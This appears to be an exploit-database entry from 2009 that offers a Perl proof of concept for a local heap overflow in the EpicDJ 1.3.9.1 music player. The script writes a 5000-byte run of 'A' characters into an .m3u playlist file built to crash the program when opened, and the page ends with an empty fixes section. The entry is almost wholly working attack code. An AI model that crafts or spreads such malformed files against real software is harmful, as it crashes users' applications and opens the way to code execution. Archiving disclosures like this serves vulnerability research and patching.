EpicDJ 1.3.9.1 (.mpl-.m3u) Local Heap Overflow PoC
2009-07-20 18:03:22#!/usr/bin/perl
# Found By :: HACK4LOVE
# EpicDJ 1.3.9.1 (.mpl / .m3u ) Local heap Overflow PoC
# http://www.epicdjsoftware.com/
########################################################################################
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################
#
Fixes
No fixesIn order to submit a new fix you need to be registered.

